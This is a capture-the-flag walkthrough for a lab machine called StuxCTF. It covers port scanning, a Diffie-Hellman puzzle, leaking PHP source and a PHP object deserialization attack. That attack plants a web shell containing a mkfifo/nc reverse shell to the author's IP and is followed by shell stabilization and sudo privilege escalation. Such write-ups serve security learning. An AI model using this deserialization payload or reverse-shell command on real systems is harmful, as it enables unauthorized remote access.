Read user.txt and root.txt
Enumeration
Let's add to /etc/hosts/ and run our usual rustscan
╰─⠠⠵ rustscan -a stuxctf --ulimit 10000 -- -sC -sV -oA stuxctf -A
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
Real hackers hack time ⌛
[~] The config file is expected to be at "/home/tony/.rustscan.toml"
[~] Automatically increasing ulimit value to 10000.
Open 10.10.194.64:22
Open 10.10.194.64:80
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")
[~] Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-04 00:22 BST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:22
Completed NSE at 00:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:22
Completed NSE at 00:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:22
Completed NSE at 00:22, 0.00s elapsed
Initiating Ping Scan at 00:22
Scanning 10.10.194.64 [2 ports]
Completed Ping Scan at 00:22, 0.03s elapsed (1 total hosts)
Initiating Connect Scan at 00:22
Scanning stuxctf (10.10.194.64) [2 ports]
Discovered open port 22/tcp on 10.10.194.64
Discovered open port 80/tcp on 10.10.194.64
Completed Connect Scan at 00:22, 0.04s elapsed (2 total ports)
Initiating Service scan at 00:22
Scanning 2 services on stuxctf (10.10.194.64)
Completed Service scan at 00:22, 6.11s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.194.64.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:22
Completed NSE at 00:22, 1.34s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:22
Completed NSE at 00:22, 0.17s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:22
Completed NSE at 00:22, 0.00s elapsed
Nmap scan report for stuxctf (10.10.194.64)
Host is up, received syn-ack (0.035s latency).
Scanned at 2021-04-04 00:22:51 BST for 7s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e8:da:b7:0d:a7:a1:cc:8e:ac:4b:19:6d:25:2b:3e:77 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDHy6u+PbjzbKZyYYJwrdwKQPHa7m8AgiJwNQSx4Tp1IOOf2y8QZTm3/iln/TJsLNdRuOORhMymecTm0H8X+Oqq481qx5hcLb4ax88tzD/yHMYIWpgMVphjZRzvBpuYmL6tS25ltX5C8VUyIfAAp5UfmwTJTpQc6yUsf/SzA1JfHRMKYrKarm+HyiTA7Md5en7DkYf/Cc3D2RTvgmzyUEES1sWXIKlqG+Hw5Q3LBTf+x3Klv4j/nTjRnQ11uGXQUV+bf/hctQ+pd5lcOACdyvW1XDOoKVVFy794JUBZIE8KFJlDF9kDDk+/9KcXPFmwHRc7EhcvoOXI0IgdY9hHbA5v
| 256 c1:0c:5a:db:6c:d6:a3:15:96:85:21:e9:48:65:28:42 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBNClIhCJbrZ4E0DajP2/THDkSRCFIIz+E4n0lwO2uwYKXLH+ZkmJfWPIS0G1imPiAl86M4waW46uhq+zd2zf7nY=
| 256 0f:1a:6a:d1:bb:cb:a6:3e:bd:8f:99:8d:da:2f:30:86 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPhnACR59xmsr8aznDId/sXX28PkUm6kKDeoNMHsgY3O
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
| http-robots.txt: 1 disallowed entry
|_/StuxCTF/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Default Page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 00:22
Completed NSE at 00:22, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 00:22
Completed NSE at 00:22, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 00:22
Completed NSE at 00:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.14 seconds
22/ssh
No credentials so let's move on ....
80/http
Simple page but we have some html comments
<html>
<head>
<title>Default Page</title>
</head>
<body>
<!-- The secret directory is...
p: 99752986619300850860197084028704021911141717[REDACTED]60469454315876556947370642[REDACTED]24506376929926694545081888689821796050434591251;
g: 7;
a: 330;
b: 450;
g^c: 60919178008335987415309240817622254774182770101420226227316881582977596213294[REDACTED]8549791707898878144888994707435069422020976[REDACTED]705739528359582454617;
-->
is blank....
</body>
</html>
If we look at /robots.txt we see a another directory
# robots.txt generated by StuxCTF
# Diffie-Hellman
User-agent: *
Disallow:
Disallow: /StuxCTF/
Browsing to /StuxCTF/ we get a 404....
Let's give gobuster a try ....
What is the hidden directory?
What is the hidden directory?
HINT: g ^ a mod p, g ^ b mod p, g ^ C mod p
first 128 characters ...
Whilst waiting for gobuster to complete let's take a look at the The secret directory is ....
p:99752986619300850860197084[REDACTED]1745913160469454315876556947370642799226714405016920875594030192024506376929926694545[REDACTED]50434591251;
g: 7;
a: [REDACTED];
b: [REDACTED];
g^c:60919178008335[REDACTED]40817622254774182770101420226227316881582977596213294070709854979170789887814488899470743[REDACTED]69840915705739528359582454617;
Not sure what this is but the robots.txt drops a hint of Diffie-Hellman. Looking around I find https://pequalsnp-team.github.io/writeups/crypto300_1 and end up with the below
#!/usr/bin/python3
p=9975298661930085086019708402870402191114171745913160469454315876556947370642799226714405[REDACTED]376929926694545081888689821796050434591251
g=[REDACTED]
a=[REDACTED]
b=[REDACTED]
gc=609191780083359874153092408176222547741827701014202262273168815829775962132940707098549791[REDACTED]89947074350694220209769840915705739528359582454617
gca = (gc**a) % p
gcab = (gca**b) % p
print(str(gcab)[:128])
The output of this is the secret directory.
User.txt
Browsing to our hidden directory ...
<!DOCTYPE html>
<head>
<title>StuxCTF</title>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="assets/css/bootstrap.min.css" />
<link rel="stylesheet" href="assets/css/style.css" />
</head>
<body>
<nav class="navbar navbar-default navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
</button>
<a class="navbar-brand" href="index.php">Home</a>
</div>
</div>
</nav>
<!-- hint: /?file= -->
<div class="container">
<div class="jumbotron">
<center>
<h1>Follow the white rabbit..</h1>
</center>
</div>
</div>
<script src="assets/js/jquery-1.11.3.min.js"></script>
<script src="assets/js/bootstrap.min.js"></script>
</body>
</html>
Hmm....<!-- hint: /?file= --> sounds like an lfi... trying our usual lfi test via /etc/passwd does not seem to work. Trying wfuzz does not bring back anything useful either.
╰─⠠⠵ wfuzz -z file,/opt/SecLists/Fuzzing/LFI/LFI-LFISuite-pathtotest-huge.txt --hl 31 http://stuxctf.local/[REDACTED]\?file\=FUZZ
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/bing.py Exception, msg=No module named 'shodan'
libraries.FileLoader: CRITICAL __load_py_from_file. Filename: /usr/lib/python3/dist-packages/wfuzz/plugins/payloads/shodanp.py Exception, msg=No module named 'shodan'
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://stuxctf.local/[REDACTED]?file=FUZZ
Total requests: 9513
===================================================================
ID Response Lines Word Chars Payload
===================================================================
Total time: 37.47722
Processed Requests: 9513
Filtered Requests: 9513
Requests/sec.: 253.8341
Lets try gobuster
╰─⠠⠵ gobuster dir -u http://stuxctf.local/[REDACTED] -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x txt,html,php,htm,gz,tar.gz,zip,db
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://stuxctf.local/[REDACTED]
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: htm,gz,tar.gz,zip,db,txt,html,php
[+] Timeout: 10s
===============================================================
2021/04/04 00:51:26 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 1168]
/assets (Status: 301) [Size: 444] [--> http://stuxctf.local/[REDACTED]assets/]
Looking under assets we have js which includes app.js
function senddata() {
var search = $("#search").val();
var replace = $("#replace").val();
var content = $("#content").val();
if(search == "" || replace == "" || content == "") {
$("#output").text("No input given!");
}
$.ajax({
url: "ajax.php",
data: {
'search':search,
'replace':replace,
'content':content
},
method: 'post'
}).success(function(data) {
$("#output").text(data)
}).fail(function(data) {
$("#output").text("OOps, something went wrong...\n"+data)
})
return false;
}
This leads us to ajax.php.... Looking around I can not find it but after trying /index.php?file=ajax.php we get some output...
Trying a few different things I decide to try index.php to see if I can find anything useful.
This returns a longs string across the page, it appears to be hex throwing this into [cyberchef`](https://gchq.github.io/CyberChef/) we get what looks like a reverse `base64` string
Reversing this string and base64 decoding we get the webpage source code.
Looking at the source code we get the below interesting bits
error_reporting(0);<br />
class file {<br />
public $file = "dump.txt";<br />
public $data = "dump test";<br />
function __destruct(){<br />
file_put_contents($this->file, $this->data);<br />
}<br />
}<br />
<br />
<br />
$file_name = $_GET['file'];<br />
if(isset($file_name) && !file_exists($file_name)){<br />
echo "File no Exist!";<br />
}<br />
<br />
if($file_name=="index.php"){<br />
$content = file_get_contents($file_name);<br />
$tags = array("", "");<br />
echo bin2hex(strrev(base64_encode(nl2br(str_replace($tags, "", $content)))));<br />
}<br />
unserialize(file_get_contents($file_name));<br />
So from the above we need to serialise the below
| type | name | explanation |
|---|---|---|
| class | file | what we want to serialise |
| variable | $file | file we want to create |
| variable | %data | contents of the file |
In my case
| name | value | note |
|---|---|---|
| class name | file | name of the class we are abusing |
| $file | assets/shell.php | we can list assets so can see if our file gets created or not |
| $data | <?php echo exec('reverse shell') ?> |
Our reverse shell |
To get the needed output I use the below php
<?php
class file
{
public $file = 'assets/shell.php';
public $data = "<?php echo exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.14.9.177 4444 >/tmp/f') ?>";
}
$serial = serialize(new file);
print $serial;
print("\n");
?>
I then run it using php serial.php which outputs O:4:"file":2:{s:4:"file";s:16:"assets/shell.php";s:4:"data";s:100:"<?php echo exec('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.14.9.177 4444 >/tmp/f') ?>";} . I trying using this ?file but it does not work.
So re-reading the above code I notice the line is
unserialize(file_get_contents($file_name))
This means it reads the contents of a file and deserializes it.... so lets change tact and try to load the file from our local machine
# redirect the output into a file
╰─⠠⠵ php serial.php > shell.txt
# start out webserver
╰─⠠⠵ python3 -m http.server 8888
In our browser we now use ?file=http://OURIP:8888/shell.txt which makes a call back to us.
╰─⠠⠵ python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.10.194.64 - - [04/Apr/2021 01:29:29] "GET /shell.txt HTTP/1.0" 200 -
If we know start our listener and then browse to shell.php we get a call back...
╰─⠠⠵ nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.194.64 44754
/bin/sh: 0: can't access tty; job control turned off
$ find /home
/home
/home/grecia
/home/grecia/user.txt
/home/grecia/.bash_logout
/home/grecia/.profile
/home/grecia/.wget-hsts
/home/grecia/.bashrc
/home/grecia/.nano
/home/grecia/.bash_history
/home/grecia/.sudo_as_admin_successful
/home/grecia/.cache
find: '/home/grecia/.cache': Permission denied
$ cat /home/grecia/user.txt
[REDACTED]
Root.txt
Now we have the user flag we need to look for privesc to get root.txt. Let's start by stabilizing our shell.
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/home/grecia$ export TERM=xterm
export TERM=xterm
www-data@ubuntu:/home/grecia$ ^Z
[1] + 32162 suspended nc -lvnp 4444
╰─⠠⠵ stty raw -echo; fg
[1] + 32162 continued nc -lvnp 4444
www-data@ubuntu:/home/grecia$
www-data@ubuntu:/home/grecia$
www-data@ubuntu:/home/grecia$
Now let's check sudo -l
www-data@ubuntu:/home/grecia$ sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(ALL) NOPASSWD: ALL
Great!!!! we can run sudo with no password and any command...
www-data@ubuntu:/home/grecia$ sudo cat /root/root.txt
[REDACTED]]
A simple sudo cat gives us our root flag.
Done!
Interesting room, learned a bit about Diffie-Hellman and php serialization
